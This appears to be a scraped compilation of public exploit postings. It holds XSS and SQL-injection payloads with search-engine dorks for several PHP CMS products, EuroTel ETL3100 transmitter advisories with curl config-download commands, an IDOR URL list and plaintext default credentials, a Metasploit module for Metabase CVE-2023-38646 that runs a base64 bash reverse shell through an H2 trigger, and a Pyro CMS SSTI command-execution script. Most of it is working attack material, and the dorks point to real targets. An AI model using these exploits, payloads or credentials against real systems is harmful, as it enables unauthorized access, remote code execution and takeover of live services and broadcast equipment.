<pre><code>====================================================================================================================================<br />| # Title : Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/social-plus-ultimate-social-network-platform/21391853 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new user https://127.0.0.1/ .<br /><br />[+] use payload in search box : <script>alert(/indoushka/);</script><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Digisha CMS V1.2.7 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : http://www.digisha.com/ | <br />| # Dork : Powered by Digisha |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & pass = 1' or 1=1 -- -<br /><br />[+] http://127.0.0.1/ksminesindiacom/admin/welcome.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DigaSell - Digital store PHP Script V1.0.0 Blind Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2 | <br />| # Dork : "Copyright © DigaSell All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : http://127.0.0.1/codsemcom/digasell/search?term=1 <==== inject here<br /> <br />[+] Panel : https://127.0.0.1/codsemcom/digasell/admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>==========================================================================================<br />| # Title : Doma CMS v1.0 xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.matstroeng.se/doma/ | <br />| # Dork : Digital Orienteering Map Archive, version 1.0 | Log in |<br />==========================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22<br /><br />[+] http://127.0.0.1/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Desenvolvido C3iM CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : http://c3im.pt/ | <br />| # Dork : intext:''Desenvolvido C3iM'' site:pt |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) <br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily complain with analog and digital DAB standard. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three band are provided to easily<br />complain with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The TV and FM transmitter suffers from an unauthenticated<br />configuration and log download vulnerability. This will enable<br />the attacker to disclose sensitive information and help him in<br />authentication bypass, privilege escalation and full system access.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5784<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />$ curl http://192.168.2.166/cfg_download.php -o config.tgz<br />$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) <br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily complain with analog and digital DAB standard. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three band are provided to easily<br />complain with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The application is vulnerable to insecure direct object references<br />that occur when the application provides direct access to objects based<br />on user-supplied input. As a result of this vulnerability attackers can<br />bypass authorization and access the hidden resources on the system and<br />execute privileged functionalities.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5783<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />See URL:<br /><br />TARGET/exciter.php?page=0<br />TARGET/exciter.php?page=1<br />TARGET/exciter.php?page=2<br />...<br />...<br />TARGET/exciter.php?page=29<br />TARGET/exciter.php?page=30<br />TARGET/exciter.php?page=31<br /></code></pre>
<pre><code><br />EuroTel ETL3100 Transmitter Default Credentials<br /><br />Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L<br />Product web page: https://www.eurotel.it | https://www.siel.fm<br />Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter) <br /> v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)<br /><br /><br />Summary: RF Technology For Television Broadcasting Applications.<br />The Series ETL3100 Radio Transmitter provides all the necessary<br />features defined by the FM and DAB standards. Two bands are provided<br />to easily complain with analog and digital DAB standard. The Series<br />ETL3100 Television Transmitter provides all the necessary features<br />defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as<br />well as the analog TV standards. Three band are provided to easily<br />complain with all standard channels, and switch softly from analog-TV<br />'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.<br /><br />Desc: The TV and FM transmitter uses a weak set of default administrative<br />credentials that can be guessed in remote password attacks and gain full<br />control of the system.<br /><br />Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)<br /> lighttpd/1.4.26<br /> PHP/5.4.3<br /> Xilinx Virtex Machine<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5782<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php<br /><br /><br />29.04.2023<br /><br />--<br /><br /><br />Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode.<br />Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Metabase Setup Token RCE',<br /> 'Description' => %q{<br /> Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token<br /> is accessible even after the setup process has been completed. With this token<br /> a user is able to submit the setup functionality to create a new database.<br /> When creating a new database, an H2 database string is created with a TRIGGER<br /> that allows for code execution. We use a sample database for our connection<br /> string to prevent corrupting real databases.<br /><br /> Successfully tested against Metabase 0.46.6.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Maxwell Garrett', # original PoC, analysis<br /> 'Shubham Shah' # original PoC, analysis<br /> ],<br /> 'References' => [<br /> ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],<br /> ['URL', 'https://www.metabase.com/blog/security-advisory'],<br /> ['CVE', '2023-38646']<br /> ],<br /> 'Platform' => ['unix'],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python<br /> },<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2023-07-22',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(3000),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def get_bootstrap_json_blob_from_html_resp(html)<br /> %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html<br /> begin<br /> JSON.parse(Regexp.last_match(1))<br /> rescue JSON::ParserError, TypeError<br /> print_bad('Unable to parse JSON blob')<br /> nil<br /> end<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> json = get_bootstrap_json_blob_from_html_resp(res.body)<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?<br /> version = json.dig('version', 'tag')<br /> return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?<br /><br /> # typically v0.46.6<br /> version = version.gsub('v', '')<br /><br /> if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')<br /> return CheckCode::Appears("Version Detected: #{version}")<br /> end<br /><br /> CheckCode::Safe("Version not vulnerable: #{version}")<br /> end<br /><br /> def exploit<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /> json = get_bootstrap_json_blob_from_html_resp(res.body)<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?<br /> setup_token = json['setup-token']<br /> if setup_token.nil?<br /> print_status('Setup token is nil, checking secondary location')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),<br /> 'method' => 'GET'<br /> )<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /> json = res.get_json_document<br /> setup_token = json['setup-token']<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?<br /> print_good("Found setup token: #{setup_token}")<br /><br /> print_status('Sending exploit (may take a few seconds)')<br /> # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them<br /> b64_pe = ::Base64.strict_encode64(payload.encoded)<br /> equals_count = b64_pe.count('=')<br /> if equals_count > 0<br /> b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)<br /> end<br /><br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => {<br /> 'token' => setup_token,<br /> 'details' =><br /> {<br /> # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get<br /> # 'is_full_sync' => false,<br /> # 'is_sample' => false,<br /> # 'cache_ttl' => nil,<br /> # 'refingerprint' => false,<br /> # 'auto_run_queries' => true,<br /> # 'schedules' => {},<br /> 'details' =><br /> {<br /> 'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",<br /> 'advanced-options' => false,<br /> 'ssl' => true<br /> },<br /> 'name' => Rex::Text.rand_text_alphanumeric(6..12),<br /> 'engine' => 'h2'<br /> }<br /> }.to_json<br /> )<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)<br /># Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security<br /># Date: 03/08/2023<br /># Vendor: https://pyrocms.com/<br /># Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation<br /># Vulnerable Version(s): 3.9<br /># CVE: CVE-2023-29689<br /># Notes: You need a user who has access to /admin privilege<br /><br /># Example Usage:<br /># First, run the script: python3 CVE-2023-29689.py<br /># Please follow these steps:<br /># 1. Enter the application URL: http://localhost:8000<br /># 2. Enter the email for authentication: admin@adm.com<br /># 3. Enter the password: Admin@@2023<br /># 4. Enter the command to be executed: id<br /># Result of command execution:<br /># uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)<br /><br />import requests<br />from bs4 import BeautifulSoup<br />from urllib.parse import urljoin<br /><br />def login(session, url, email, password):<br /> login_url = urljoin(url, '/admin/login')<br /> response = session.get(login_url)<br /> soup = BeautifulSoup(response.content, 'html.parser')<br /> token = soup.find('input', {'name': '_token'})['value']<br /><br /> payload = {<br /> '_token': token,<br /> 'email': email,<br /> 'password': password<br /> }<br /><br /> session.post(login_url, data=payload)<br /><br /># Function to edit role 1 and extract the Description of the Admin user.<br />def edit_role_and_extract_description(session, url, command):<br /> edit_role_url = urljoin(url, '/admin/users/roles/edit/1')<br /> response = session.get(edit_role_url)<br /> soup = BeautifulSoup(response.content, 'html.parser')<br /> token = soup.find('input', {'name': '_token'})['value']<br /><br /> payload = {<br /> '_token': token,<br /> 'name_en': 'Admin',<br /> 'slug': 'admin',<br /> 'description_en': f'{{{{["{command}"]|map("system")|join}}}}',<br /> 'action': 'save_exit'<br /> }<br /><br /> session.post(edit_role_url, data=payload)<br /><br /> # Extract the updated Description from role 1.<br /> response = session.get(urljoin(url, '/admin/users/roles'))<br /> soup = BeautifulSoup(response.content, 'html.parser')<br /> description = soup.find('td', {'data-title': 'Description'}).text.strip()<br /><br /> return description<br /> <br />def main():<br /> url = input("Enter the application URL: ")<br /> email = input("Enter the email for authentication: ")<br /> password = input("Enter the password : ")<br /> command = input("Enter the command to be executed: ")<br /><br /> with requests.Session() as session:<br /> login(session, url, email, password)<br /> description = edit_role_and_extract_description(session, url, command)<br /> print("\nResult of command execution:")<br /> print(description)<br /><br />if __name__ == "__main__":<br /> main()<br /><br /></code></pre>